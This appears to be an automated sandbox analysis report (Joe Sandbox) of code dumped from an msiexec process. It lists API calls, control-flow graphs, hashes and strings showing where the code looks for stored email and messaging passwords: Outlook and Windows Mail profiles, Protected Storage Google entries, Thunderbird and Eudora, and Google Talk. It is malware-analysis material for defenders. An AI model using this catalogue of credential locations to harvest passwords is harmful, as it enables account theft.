60 API calls 33923 43fedc 138 API calls 33924 4116e1 16 API calls __fprintf_l 33740 4244e6 19 API calls 33742 42e8e8 127 API calls __fprintf_l 33743 4118ee RtlLeaveCriticalSection 33929 43f6ec 22 API calls 33745 425115 119 API calls __fprintf_l 33746 410cf3 EnumResourceNamesA 33932 4492f0 memcpy memcpy 33934 43fafa 18 API calls 33936 4342f9 15 API calls __fprintf_l 33747 4144fd 19 API calls 33938 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 33939 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 33942 443a84 _mbscpy 33944 43f681 17 API calls 33750 404487 22 API calls 33946 415e8c 16 API calls __fprintf_l 33754 411893 RtlDeleteCriticalSection __fprintf_l 33755 41a492 42 API calls 33950 403e96 34 API calls 33951 410e98 memset SHGetPathFromIDList SendMessageA 33757 426741 109 API calls __fprintf_l 33758 4344a2 18 API calls 33759 4094a2 10 API calls 33954 4116a6 15 API calls __fprintf_l 33955 43f6a4 17 API calls 33956 440aa3 20 API calls 33958 427430 45 API calls 33762 4090b0 7 API calls 33763 4148b0 15 API calls 33765 4118b4 RtlEnterCriticalSection 33766 4014b7 CreateWindowExA 33767 40c8b8 19 API calls 33769 4118bf RtlTryEnterCriticalSection 33963 42434a 18 API calls __fprintf_l 33965 405f53 12 API calls 33777 43f956 59 API calls 33779 40955a 17 API calls 33780 428561 36 API calls 33781 409164 7 API calls 33969 404366 19 API calls 33973 40176c ExitProcess 33976 410777 42 API calls 33786 40dd7b 51 API calls 33787 425d7c 16 API calls __fprintf_l 33978 43f6f0 25 API calls 33979 42db01 22 API calls 33788 412905 15 API calls __fprintf_l 33980 403b04 54 API calls 33981 405f04 SetDlgItemTextA GetDlgItemTextA 33982 44b301 ??3@YAXPAX 33985 4120ea 14 API calls 3 library calls 33986 40bb0a 8 API calls 33988 413f11 strcmp 33792 434110 17 API calls __fprintf_l 33794 425115 108 API calls __fprintf_l 33989 444b11 _onexit 33796 425115 76 API calls __fprintf_l 33799 429d19 10 API calls 33992 444b1f __dllonexit 33993 409f20 _strcmpi 33801 42b927 31 API calls 33996 433f26 19 API calls __fprintf_l 33997 44b323 FreeLibrary 33998 427f25 46 API calls 33999 43ff2b 17 API calls 34000 43fb30 19 API calls 33808 414d36 16 API calls 33810 40ad38 7 API calls 34002 433b38 16 API calls __fprintf_l 33680 44b33b 33681 44b344 ??3@YAXPAX 33680->33681 33682 44b34b 33680->33682 33681->33682 33683 44b354 ??3@YAXPAX 33682->33683 33684 44b35b 33682->33684 33683->33684 33685 44b364 ??3@YAXPAX 33684->33685 33686 44b36b 33684->33686 33685->33686 33687 44b374 ??3@YAXPAX 33686->33687 33688 44b37b 33686->33688 33687->33688 33814 426741 21 API calls 33815 40c5c3 123 API calls 33817 43fdc5 17 API calls 34003 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33820 4161cb memcpy memcpy memcpy memcpy 34008 43ffc8 18 API calls 34010 4383cc 110 API calls __fprintf_l 33822 4275d3 41 API calls 34011 4153d3 22 API calls __fprintf_l 33823 444dd7 _XcptFilter 34016 4013de 15 API calls 34018 425115 111 API calls __fprintf_l 34019 43f7db 18 API calls 34022 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33826 4335ee 16 API calls __fprintf_l 34024 429fef 11 API calls 33827 444deb _exit _c_exit 34025 40bbf0 133 API calls 33830 425115 79 API calls __fprintf_l 34029 437ffa 22 API calls 33834 4021ff 14 API calls 33835 43f5fc 149 API calls 34030 40e381 9 API calls 33837 405983 40 API calls 33838 42b186 27 API calls __fprintf_l 33839 427d86 76 API calls 33840 403585 20 API calls 33842 42e58e 18 API calls __fprintf_l 33845 425115 75 API calls __fprintf_l 33847 401592 8 API calls 32883 410b92 32886 410a6b 32883->32886 32885 410bb2 32887 410a77 32886->32887 32888 410a89 GetPrivateProfileIntA 32886->32888 32891 410983 memset _itoa WritePrivateProfileStringA 32887->32891 32888->32885 32890 410a84 32890->32885 32891->32890 34034 434395 16 API calls 33849 441d9c memcmp 34036 43f79b 119 API calls 33850 40c599 42 API calls 34037 426741 87 API calls 33854 4401a6 21 API calls 33856 426da6 memcpy memset memset memcpy 33857 4335a5 15 API calls 33859 4299ab memset memset memcpy memset memset 33860 40b1ab 8 API calls 34042 425115 76 API calls __fprintf_l 34046 4113b2 18 API calls 2 library calls 34050 40a3b8 memset sprintf SendMessageA 32892 410bbc 32895 4109cf 32892->32895 32896 4109dc 32895->32896 32897 410a23 memset GetPrivateProfileStringA 32896->32897 32898 4109ea memset 32896->32898 32903 407646 strlen 32897->32903 32908 4075cd sprintf memcpy 32898->32908 32901 410a0c WritePrivateProfileStringA 32902 410a65 32901->32902 32904 40765a 32903->32904 32906 40765c 32903->32906 32904->32902 32905 4076a3 32905->32902 32906->32905 32909 40737c strtoul 32906->32909 32908->32901 32909->32906 33862 40b5bf memset memset _mbsicmp

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                              APIs
                                                              • memset.MSVCRT ref: 0040832F
                                                              • memset.MSVCRT ref: 00408343
                                                              • memset.MSVCRT ref: 0040835F
                                                              • memset.MSVCRT ref: 00408376
                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • strlen.MSVCRT ref: 004083E9
                                                              • strlen.MSVCRT ref: 004083F8
                                                              • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                              • String ID: 5$H$O$b$i$}$}
                                                              • API String ID: 1832431107-3760989150
                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 335 407ef8-407f01 336 407f03-407f22 FindFirstFileA 335->336 337 407f24-407f38 FindNextFileA 335->337 338 407f3f-407f44 336->338 339 407f46-407f74 strlen * 2 337->339 340 407f3a call 407f90 337->340 338->339 342 407f89-407f8f 338->342 343 407f83 339->343 344 407f76-407f81 call 4070e3 339->344 340->338 345 407f86-407f88 343->345 344->345 345->342
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                              • strlen.MSVCRT ref: 00407F5C
                                                              • strlen.MSVCRT ref: 00407F64
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: FileFindstrlen$FirstNext
                                                              • String ID: ACD
                                                              • API String ID: 379999529-620537770
                                                              • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                              • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                              • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 00401E8B
                                                              • strlen.MSVCRT ref: 00401EA4
                                                              • strlen.MSVCRT ref: 00401EB2
                                                              • strlen.MSVCRT ref: 00401EF8
                                                              • strlen.MSVCRT ref: 00401F06
                                                              • memset.MSVCRT ref: 00401FB1
                                                              • atoi.MSVCRT(?), ref: 00401FE0
                                                              • memset.MSVCRT ref: 00402003
                                                              • sprintf.MSVCRT ref: 00402030
                                                              • memset.MSVCRT ref: 00402086
                                                              • memset.MSVCRT ref: 0040209B
                                                              • strlen.MSVCRT ref: 004020A1
                                                              • strlen.MSVCRT ref: 004020AF
                                                              • strlen.MSVCRT ref: 004020E2
                                                              • strlen.MSVCRT ref: 004020F0
                                                              • memset.MSVCRT ref: 00402018
                                                                • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                                              • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                                                                • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                                              • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: strlen$memset$_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                                                              • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                                                              • API String ID: 3833278029-4223776976
                                                              • Opcode ID: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                              • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                                                              • Opcode Fuzzy Hash: 22bf87547929d6464d555c30866af4eff336c20ded2a6a53d3974d6186b3e924
                                                              • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                                                                • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                                                                • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                                                                • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                                                              • ??3@YAXPAX@Z.MSVCRT(?), ref: 0040D190
                                                              • DeleteObject.GDI32(?), ref: 0040D1A6
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                                                              • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                                                              • API String ID: 745651260-375988210
                                                              • Opcode ID: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                              • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                                                              • Opcode Fuzzy Hash: 01abe85119e862d03ebbcbf30b96c63784c41f31500a9bb9b68e18ec68e211b7
                                                              • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                                                              • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                                                              • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                                                              • _mbscpy.MSVCRT(?,?), ref: 00403E54
                                                              Strings
                                                              • PStoreCreateInstance, xrefs: 00403C44
                                                              • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                                                              • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                                                              • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                                                              • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                                                              • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                                                              • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                                                              • pstorec.dll, xrefs: 00403C30
                                                              • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                                                              • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                                                              • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                                                              • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Library$AddressFreeLoadProc_mbscpy
                                                              • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                                                              • API String ID: 1197458902-317895162
                                                              • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                                                              • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                                                              • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                              • String ID:
                                                              • API String ID: 3662548030-0
                                                              • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                                                              • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                                                              • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 0044430B
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                                                                • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                                                                • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                                                                • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                                                                • Part of subcall function 00410DBB: _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                              • memset.MSVCRT ref: 00444379
                                                              • memset.MSVCRT ref: 00444394
                                                              • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                                                              • strlen.MSVCRT ref: 004443DB
                                                              • _strcmpi.MSVCRT ref: 00444401
                                                              Strings
                                                              • Store Root, xrefs: 004443A5
                                                              • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                                                              • \Microsoft\Windows Mail, xrefs: 00444329
                                                              • \Microsoft\Windows Live Mail, xrefs: 00444350
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$strlen$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                              • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                                                              • API String ID: 3203569119-2578778931
                                                              • Opcode ID: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                              • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                                                              • Opcode Fuzzy Hash: 273af5b117a68215158004e23a68f38449220407a2e325f643dbca173f5fc703
                                                              • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 290 40ccd7-40cd06 ??2@YAPAXI@Z 291 40cd08-40cd0d 290->291 292 40cd0f 290->292 293 40cd11-40cd24 ??2@YAPAXI@Z 291->293 292->293 294 40cd26-40cd2d call 404025 293->294 295 40cd2f 293->295 297 40cd31-40cd57 294->297 295->297 299 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 297->299 300 40cd59-40cd60 DeleteObject 297->300 300->299
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                              • String ID:
                                                              • API String ID: 2054149589-0
                                                              • Opcode ID: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                              • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                                                              • Opcode Fuzzy Hash: dbced873dea8b6f5d2abe1eeb19a5d79894199d53c97d45454c9f74d68e3b887
                                                              • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 307 40ba28-40ba3a 308 40ba87-40ba9b call 406c62 307->308 309 40ba3c-40ba52 call 407e20 _mbsicmp 307->309 331 40ba9d call 4107f1 308->331 332 40ba9d call 404734 308->332 333 40ba9d call 404785 308->333 334 40ba9d call 403c16 308->334 314 40ba54-40ba6d call 407e20 309->314 315 40ba7b-40ba85 309->315 321 40ba74 314->321 322 40ba6f-40ba72 314->322 315->308 315->309 316 40baa0-40bab3 call 407e30 324 40bab5-40bac1 316->324 325 40bafa-40bb09 SetCursor 316->325 323 40ba75-40ba76 call 40b5e5 321->323 322->323 323->315 327 40bac3-40bace 324->327 328 40bad8-40baf7 qsort 324->328 327->328 328->325 331->316 332->316 333->316 334->316
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: Cursor_mbsicmpqsort
                                                              • String ID: /nosort$/sort
                                                              • API String ID: 882979914-1578091866
                                                              • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                                                              • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                                                              • Instruction Fuzzy Hash: 2D2192B1704601EFD719AF75C880A69B7A9FF48318B10027EF419A7291CB39BC12CBD9

                                                              Control-flow Graph

                                                              APIs
                                                              • memset.MSVCRT ref: 004109F7
                                                                • Part of subcall function 004075CD: sprintf.MSVCRT ref: 00407605
                                                                • Part of subcall function 004075CD: memcpy.MSVCRT(?,00000000,00000003,00000000,%2.2X ,?), ref: 00407618
                                                              • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410A1B
                                                              • memset.MSVCRT ref: 00410A32
                                                              • GetPrivateProfileStringA.KERNEL32(?,?,0044C52F,?,00002000,?), ref: 00410A50
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                              • String ID:
                                                              • API String ID: 3143880245-0
                                                              • Opcode ID: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction ID: 950c872411b2f2d44c5e3370b52dcf3132a88c3cdc41bb294f16927293e6b240
                                                              • Opcode Fuzzy Hash: 06440367014e030cd30049a245fb0cc3fb8be964b179c0619a4e1c6a0770dea7
                                                              • Instruction Fuzzy Hash: A401A172804319BBEF119F50DC86EDB7B7CEF05344F0000A6F604A2052E635AA64CBA9

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 358 44b33b-44b342 359 44b344-44b34a ??3@YAXPAX@Z 358->359 360 44b34b-44b352 358->360 359->360 361 44b354-44b35a ??3@YAXPAX@Z 360->361 362 44b35b-44b362 360->362 361->362 363 44b364-44b36a ??3@YAXPAX@Z 362->363 364 44b36b-44b372 362->364 363->364 365 44b374-44b37a ??3@YAXPAX@Z 364->365 366 44b37b 364->366 365->366
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                              • Opcode Fuzzy Hash: 0ad1635ea08d581da3d46e9cfe4a801b3f478eb4f35f0f6f88290fc2b5bda708
                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 367 410dbb-410dd2 call 410d0e 370 410dd4-410ddd call 4070ae 367->370 371 410dfd-410e1b memset 367->371 379 410ddf-410de2 370->379 380 410dee-410df1 370->380 373 410e27-410e35 371->373 374 410e1d-410e20 371->374 375 410e45-410e4f call 410a9c 373->375 374->373 377 410e22-410e25 374->377 384 410e51-410e76 call 410d3d call 410add 375->384 385 410e7f-410e92 _mbscpy 375->385 377->373 381 410e37-410e40 377->381 379->371 383 410de4-410de7 379->383 387 410df8 380->387 381->375 383->371 386 410de9-410dec 383->386 384->385 389 410e95-410e97 385->389 386->371 386->380 387->389
                                                              APIs
                                                                • Part of subcall function 00410D0E: LoadLibraryA.KERNEL32(shell32.dll,00410DCA,00000104), ref: 00410D1C
                                                                • Part of subcall function 00410D0E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                              • memset.MSVCRT ref: 00410E10
                                                              • _mbscpy.MSVCRT(00000000,?,?,?,?,?,?,00000104), ref: 00410E87
                                                                • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                                              Strings
                                                              • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00410E2B, 00410E3B
                                                              Memory Dump Source
                                                              • Source File: 00000010.00000002.2339241019.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_16_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressLibraryLoadProcVersion_mbscpymemset
                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                              • API String ID: 119022999-2036018995
                                                              • Opcode ID: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction ID: 345612a4203e2947e26158410096d7c3d27216bde768142914c78e2e12d87323
                                                              • Opcode Fuzzy Hash: ed5743d336984a8c18282994424b44d0bcfcd120d49097e0ee850cbc5c972bb8
                                                              • Instruction Fuzzy Hash: 89110D71C40318EBEB20B6D59C86EEF77ACDB14304F1404A7F555A2112E7BC9ED8C69A

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 393 4085d2-408605 call 44b090 call 4082cd call 410a9c 400 4086d8-4086dd 393->400 401 40860b-40863d memset call 410b62 393->401 404 4086c7-4086cc 401->404 405 408642-40865a call 410a9c 404->405 406 4086d2 404->406 409 4086b1-4086c2 call 410b62 405->409 410 40865c-4086ab memset call 410add call 40848b 405->410 406->400 409->404 410->409
                                                              APIs
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                                                                • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                                                                • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                                                                • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                                                              • memset.MSVCRT ref: 00408620
                                                                • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                              • memset.MSVCRT ref: 00408671
                                                              Strings
                                                              • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                                                              Memory Dump Source
